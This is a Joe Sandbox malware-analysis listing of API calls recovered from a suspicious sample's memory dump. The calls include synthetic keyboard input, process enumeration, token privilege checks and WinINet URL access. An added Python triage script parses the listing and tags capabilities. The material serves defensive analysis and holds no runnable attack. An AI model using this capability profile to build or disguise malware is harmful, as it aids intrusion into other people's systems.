                                                  • GetWindowRect.USER32(?,?), ref: 00C7ABD6
                                                  • PtInRect.USER32(?,?,00C7C014), ref: 00C7ABE6
                                                  • MessageBeep.USER32(00000000), ref: 00C7AC57
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                  • String ID:
                                                  • API String ID: 1352109105-0
                                                  • Opcode ID: 1f962c836217b49dfec2e3204c25caba7f7c755b0da90b01d3b32339c4d601d6
                                                  • Instruction ID: 60d5992e4d804038aa0ed6b422bba3dfdae2b4afca51ce9a09b43618c0607d6b
                                                  • Opcode Fuzzy Hash: 1f962c836217b49dfec2e3204c25caba7f7c755b0da90b01d3b32339c4d601d6
                                                  • Instruction Fuzzy Hash: 60415D30600119EFCB12DF58D884B6D7BF5FB89310F18C1A9E92D9B2A1D732A941DB92
                                                  APIs
                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00C50B27
                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00C50B43
                                                  • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00C50BA9
                                                  • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00C50BFB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID:
                                                  • API String ID: 432972143-0
                                                  • Opcode ID: 45680a18894e5d02ee2483899dedfe622bae5837cd7955c009e6667348685cea
                                                  • Instruction ID: 9cc05b1d5067664bb5419e5d972ba3d59d6a5521a6152804c216f972c02f849c
                                                  • Opcode Fuzzy Hash: 45680a18894e5d02ee2483899dedfe622bae5837cd7955c009e6667348685cea
                                                  • Instruction Fuzzy Hash: BA314B34D40608AFFF308B25CC85BFDBBA5BB45316F28425AECA4D11D1C3758AC99759
                                                  APIs
                                                  • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00C50C66
                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C50C82
                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 00C50CE1
                                                  • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00C50D33
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID:
                                                  • API String ID: 432972143-0
                                                  • Opcode ID: 3e1e0fcf81c7793110e1f3db4ff7fee3b5f53929419c4b131e83b9e147ef3ec8
                                                  • Instruction ID: 13ea19a5ad2cd415bb3c5e78b1bf89c81f7f7cde16af4d6a5d9c0f4a667f8415
                                                  • Opcode Fuzzy Hash: 3e1e0fcf81c7793110e1f3db4ff7fee3b5f53929419c4b131e83b9e147ef3ec8
                                                  • Instruction Fuzzy Hash: 3B3157349002186EFF308B6588047FEBBB5AB46312F24431EECA4D61D1C334AAC9D75A
                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C261FB
                                                  • __isleadbyte_l.LIBCMT ref: 00C26229
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C26257
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C2628D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID:
                                                  • API String ID: 3058430110-0
                                                  • Opcode ID: 7b886152f81d7b17238c766db7330be461244ee31a4fb34f5768cb8823c21d6c
                                                  • Instruction ID: 52afd82f7acbd777296ff0227120a8a78fab57fce6e1a3a5d1713eab75dca955
                                                  • Opcode Fuzzy Hash: 7b886152f81d7b17238c766db7330be461244ee31a4fb34f5768cb8823c21d6c
                                                  • Instruction Fuzzy Hash: F631D230604266EFDF218F65EC44BAE7BA9FF42310F154028E86497591D730EA90D7A0
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 00C74F02
                                                    • Part of subcall function 00C53641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C5365B
                                                    • Part of subcall function 00C53641: GetCurrentThreadId.KERNEL32 ref: 00C53662
                                                    • Part of subcall function 00C53641: AttachThreadInput.USER32(00000000,?,00C55005), ref: 00C53669
                                                  • GetCaretPos.USER32(?), ref: 00C74F13
                                                  • ClientToScreen.USER32(00000000,?), ref: 00C74F4E
                                                  • GetForegroundWindow.USER32 ref: 00C74F54
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                  • String ID:
                                                  • API String ID: 2759813231-0
                                                  • Opcode ID: 2686fd4244cb594d7bd9cbd28c4340477c4cd58b97a48cd050585c575e82ceae
                                                  • Instruction ID: c79f41d4fc925dfeded088ad5054a15ad010b471c75c377b1fe1069634ab9abf
                                                  • Opcode Fuzzy Hash: 2686fd4244cb594d7bd9cbd28c4340477c4cd58b97a48cd050585c575e82ceae
                                                  • Instruction Fuzzy Hash: 2C310B71D00108AFDB04EFB5C885AEFB7F9EF99340F1040AAE915E7241DA719E498FA1
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00C53C7A
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00C53C88
                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00C53CA8
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C53D52
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: 02299f1d275951f26477e20d89066d81bbce2ddd8c5281fda5cf48fedeb0d92e
                                                  • Instruction ID: 00e72a8997a020b31c080783f6aeb58a977e5069f9083f95ba737342c5c314d1
                                                  • Opcode Fuzzy Hash: 02299f1d275951f26477e20d89066d81bbce2ddd8c5281fda5cf48fedeb0d92e
                                                  • Instruction Fuzzy Hash: A731AF311083499FD304EF24C881ABFBBF8AF95354F40086CF995871A1EB719A8DCB52
                                                  APIs
                                                    • Part of subcall function 00BF2612: GetWindowLongW.USER32(?,000000EB), ref: 00BF2623
                                                  • GetCursorPos.USER32(?), ref: 00C7C4D2
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C2B9AB,?,?,?,?,?), ref: 00C7C4E7
                                                  • GetCursorPos.USER32(?), ref: 00C7C534
                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C2B9AB,?,?,?), ref: 00C7C56E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                  • String ID:
                                                  • API String ID: 2864067406-0
                                                  • Opcode ID: 1c3731409efe940b6c427af46bf5393d372608b680e58af3dd9c1ab18d3b8c4a
                                                  • Instruction ID: a724fccc941c7207137ebaa3b54d605b5ff86af10c5db6ee133e0af683546fd7
                                                  • Opcode Fuzzy Hash: 1c3731409efe940b6c427af46bf5393d372608b680e58af3dd9c1ab18d3b8c4a
                                                  • Instruction Fuzzy Hash: 1931A735500018AFCB55CF98D894FFE7BB6EB09310F44815DF91987261C7326E51EB94
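                                                  The function-level listing above is raw sandbox output: ordinal imports such as #21.WSOCK32 and #16.WSOCK32 are unnamed, socket constants are printed as hex, and the behaviour of a block has to be inferred from which APIs appear together. The following Python script is an added example, not part of this Joe Sandbox report or of the Joe Sandbox product. It parses blocks in the "APIs" format used above (the sample input is a constructed copy of three blocks from this listing), resolves wsock32 ordinals to export names using the wsock32.dll Winsock 1.1 export order, decodes socket()/setsockopt() arguments, and tags each block with the behaviour its API combination implies. The rule sets and tag names are this example's own choices, not Joe Sandbox signatures.

```python
"""Triage helper for the 'APIs' blocks of a Joe Sandbox function listing.
Added example, not part of the report or of Joe Sandbox: parses the bullet
lines shown above, resolves wsock32 ordinal imports (e.g. #21.WSOCK32), decodes
socket()/setsockopt() constants and tags each block by implied behaviour."""
import re
from collections import namedtuple

# Constructed sample: three blocks copied from the listing in the report's format.
SAMPLE = """\
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00C669D1
  • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C66A45
Memory Dump Source
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00C53C7A
• Process32FirstW.KERNEL32(00000000,?), ref: 00C53C88
• Process32NextW.KERNEL32(00000000,?), ref: 00C53CA8
Memory Dump Source
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00C50B27
• SetKeyboardState.USER32(00000080,?,00000001), ref: 00C50B43
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00C50BFB
Memory Dump Source
"""

LINE_RE = re.compile(r"(?P<name>[#\w:]+)\.(?P<mod>[A-Z0-9]+)"
                     r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
SUBCALL_RE = re.compile(r"Part of subcall function [0-9A-Fa-f]+:\s*")
ApiCall = namedtuple("ApiCall", "name module args ref subcall")

# wsock32.dll (Winsock 1.1) exports by ordinal in alphabetical order; the sandbox
# prints imports it cannot name as '#<ordinal>'.
WSOCK32_ORDINALS = dict(enumerate([
    "accept", "bind", "closesocket", "connect", "getpeername", "getsockname",
    "getsockopt", "htonl", "htons", "inet_addr", "inet_ntoa", "ioctlsocket",
    "listen", "ntohl", "ntohs", "recv", "recvfrom", "select", "send", "sendto",
    "setsockopt", "shutdown", "socket"], start=1))
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTO = {0: "IPPROTO_DEFAULT", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
SOL = {0xFFFF: "SOL_SOCKET", 6: "IPPROTO_TCP"}
SO_OPT = {0x4: "SO_REUSEADDR", 0x20: "SO_BROADCAST", 0x1006: "SO_RCVTIMEO"}

# Behaviour rules (this example's own): a tag applies when every API occurs in the block.
RULES = [
    ({"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"}, "process enumeration (Toolhelp32)"),
    ({"GetKeyboardState", "SetKeyboardState", "SendInput"}, "synthetic keyboard input"),
    ({"GetTokenInformation", "LookupPrivilegeValueW"}, "token integrity/privilege inspection"),
    ({"GetForegroundWindow", "AttachThreadInput"}, "attaches to foreground window input queue"),
    ({"socket", "setsockopt"}, "raw Winsock socket setup"),
]

def parse_blocks(text):
    """Split the listing at 'APIs' / 'Memory Dump Source' and parse each call line."""
    blocks, current = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":
            current = []
            blocks.append(current)
            continue
        if line.startswith("Memory Dump Source"):
            current = None
        if current is None:
            continue
        sub = bool(SUBCALL_RE.match(line))          # indented 'Part of subcall' lines
        m = LINE_RE.search(SUBCALL_RE.sub("", line, count=1))
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.append(ApiCall(m["name"], m["mod"], args, m["ref"].upper(), sub))
    return blocks

def arg_int(call, i):
    """Argument i as int; None for '?', missing, or annotated values like 3(TokenIntegrityLevel)."""
    try:
        return int(call.args[i], 16)
    except (IndexError, ValueError):
        return None

def resolve_name(call):
    """Map '#21' in WSOCK32 to its export name; other names pass through."""
    if call.name.startswith("#") and call.module == "WSOCK32":
        return WSOCK32_ORDINALS.get(int(call.name[1:]), call.name)
    return call.name

def decode_socket(call):
    """socket(af, type, protocol) -> e.g. 'AF_INET/SOCK_DGRAM/IPPROTO_UDP'."""
    af, typ, proto = (arg_int(call, i) for i in range(3))
    return "/".join([AF.get(af, f"af={af}"), SOCK_TYPE.get(typ, f"type={typ}"),
                     PROTO.get(proto, f"proto={proto}")])

def decode_setsockopt(call):
    """setsockopt(s, level, optname, ...) -> e.g. 'SOL_SOCKET/SO_BROADCAST'."""
    level, opt = arg_int(call, 1), arg_int(call, 2)
    return f"{SOL.get(level, f'level={level}')}/{SO_OPT.get(opt, f'opt={opt}')}"

def tag_block(block):
    """Behaviour tags for one block, matched on resolved names."""
    names = {resolve_name(c) for c in block}
    return [tag for needed, tag in RULES if needed <= names]
```

                                                  Applied to the blocks above, the #21 call with level 0000FFFF and option 00000020 decodes to setsockopt(SOL_SOCKET, SO_BROADCAST) on the socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP) opened just before it, and #16.WSOCK32 in the following block resolves to recv. A tag only records that the capability is present in the dumped image at 00BF0000; it does not show the sample exercised it at runtime, so correlate with the behaviour and network sections of the report before treating a tag as evidence.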
                                                  APIs
                                                    • Part of subcall function 00C4810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C48121
                                                    • Part of subcall function 00C4810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C4812B
                                                    • Part of subcall function 00C4810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C4813A
                                                    • Part of subcall function 00C4810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C48141
                                                    • Part of subcall function 00C4810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C48157
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C486A3
                                                  • _memcmp.LIBCMT ref: 00C486C6
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C486FC
                                                  • HeapFree.KERNEL32(00000000), ref: 00C48703
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                  • String ID:
                                                  • API String ID: 1592001646-0
                                                  • Opcode ID: 1f841435f3236a80da8171bc72c1ea96b38bcb04c64dbf2683bb98c66af60eb6
                                                  • Instruction ID: 92bd9a481b9f6f5b64ef6f7e9203c30f8a1245f2db0fe02a6676ddb2a8d25ebc
                                                  • Opcode Fuzzy Hash: 1f841435f3236a80da8171bc72c1ea96b38bcb04c64dbf2683bb98c66af60eb6
                                                  • Instruction Fuzzy Hash: 73219D71E00108EFDB10DFA4C949BEEB7B9FF45304F164059E954AB241DB30AE49DBA4
                                                  APIs
                                                  • __setmode.LIBCMT ref: 00C109AE
                                                    • Part of subcall function 00BF5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C57896,?,?,00000000), ref: 00BF5A2C
                                                    • Part of subcall function 00BF5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C57896,?,?,00000000,?,?), ref: 00BF5A50
                                                  • _fprintf.LIBCMT ref: 00C109E5
                                                  • OutputDebugStringW.KERNEL32(?), ref: 00C45DBB
                                                    • Part of subcall function 00C14AAA: _flsall.LIBCMT ref: 00C14AC3
                                                  • __setmode.LIBCMT ref: 00C10A1A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                  • String ID:
                                                  • API String ID: 521402451-0
                                                  • Opcode ID: 510b315de1535350dad68e50c08eced499bdf9068d608412fb1ab396a0b4f6ed
                                                  • Instruction ID: ae9b8e58e06ea912b73d42477cb1229c47ed4db6ff3ad21d77cf6ec62c804823
                                                  • Opcode Fuzzy Hash: 510b315de1535350dad68e50c08eced499bdf9068d608412fb1ab396a0b4f6ed
                                                  • Instruction Fuzzy Hash: 9D1127719042086FD708B3B49C46EFE7BA89F47360F240159F21467183EE705DDA77A5
                                                  APIs
                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C617A3
                                                    • Part of subcall function 00C6182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C6184C
                                                    • Part of subcall function 00C6182D: InternetCloseHandle.WININET(00000000), ref: 00C618E9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Internet$CloseConnectHandleOpen
                                                  • String ID:
                                                  • API String ID: 1463438336-0
                                                  • Opcode ID: 876c0c64f23716d0eaeafdcfe9999974f6e97e0e0c1114178688f6e6dd924edc
                                                  • Instruction ID: c66f388125a2e09801115c929cbf3aae08ca87ad57b728275fb8e56e7a095f7f
                                                  • Opcode Fuzzy Hash: 876c0c64f23716d0eaeafdcfe9999974f6e97e0e0c1114178688f6e6dd924edc
                                                  • Instruction Fuzzy Hash: 09210431204601BFEB268F60CC81FBABBA9FF48712F18002EFD1597191DB31D911A7A0
                                                  APIs
                                                  • GetFileAttributesW.KERNEL32(?,00C7FAC0), ref: 00C53A64
                                                  • GetLastError.KERNEL32 ref: 00C53A73
                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C53A82
                                                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C7FAC0), ref: 00C53ADF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectory$AttributesErrorFileLast
                                                  • String ID:
                                                  • API String ID: 2267087916-0
                                                  • Opcode ID: 7d876082c89f052ed42857ae85596cc93ecff2ce04a55dad9c971ede7c0b0d8c
                                                  • Instruction ID: 6747a4266bdd5ee5b0370fbb2163be57cb2cd3f0e4426fe8502e5f90f7c3bb02
                                                  • Opcode Fuzzy Hash: 7d876082c89f052ed42857ae85596cc93ecff2ce04a55dad9c971ede7c0b0d8c
                                                  • Instruction Fuzzy Hash: D721D6381082459F8310DF68C88196B77E4EF153A5F104A6DF8A9C72A2DB31DE8EDB56
                                                  APIs
                                                    • Part of subcall function 00C4F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00C4DCD3,?,?,?,00C4EAC6,00000000,000000EF,00000119,?,?), ref: 00C4F0CB
                                                    • Part of subcall function 00C4F0BC: lstrcpyW.KERNEL32(00000000,?,?,00C4DCD3,?,?,?,00C4EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C4F0F1
                                                    • Part of subcall function 00C4F0BC: lstrcmpiW.KERNEL32(00000000,?,00C4DCD3,?,?,?,00C4EAC6,00000000,000000EF,00000119,?,?), ref: 00C4F122
                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00C4EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C4DCEC
                                                  • lstrcpyW.KERNEL32(00000000,?,?,00C4EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C4DD12
                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C4EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C4DD46
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: lstrcmpilstrcpylstrlen
                                                  • String ID: cdecl
                                                  • API String ID: 4031866154-3896280584
                                                  • Opcode ID: 0f4438ba4b923a9da0cc66eff19e348c6e2be47b1913636cdc39544706216a21
                                                  • Instruction ID: 9920ad8f431c12bdc3e48cc4804ccac79f9d21efd843293ff644946a53207152
                                                  • Opcode Fuzzy Hash: 0f4438ba4b923a9da0cc66eff19e348c6e2be47b1913636cdc39544706216a21
                                                  • Instruction Fuzzy Hash: 92118E3A600305EBCB25AF74DC45E7E77A9FF46350B40813AF816CB2A0EB719991D7A1
                                                  APIs
                                                  • _free.LIBCMT ref: 00C25101
                                                    • Part of subcall function 00C1571C: __FF_MSGBANNER.LIBCMT ref: 00C15733
                                                    • Part of subcall function 00C1571C: __NMSG_WRITE.LIBCMT ref: 00C1573A
                                                    • Part of subcall function 00C1571C: RtlAllocateHeap.NTDLL(01550000,00000000,00000001,00000000,?,?,?,00C10DD3,?), ref: 00C1575F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
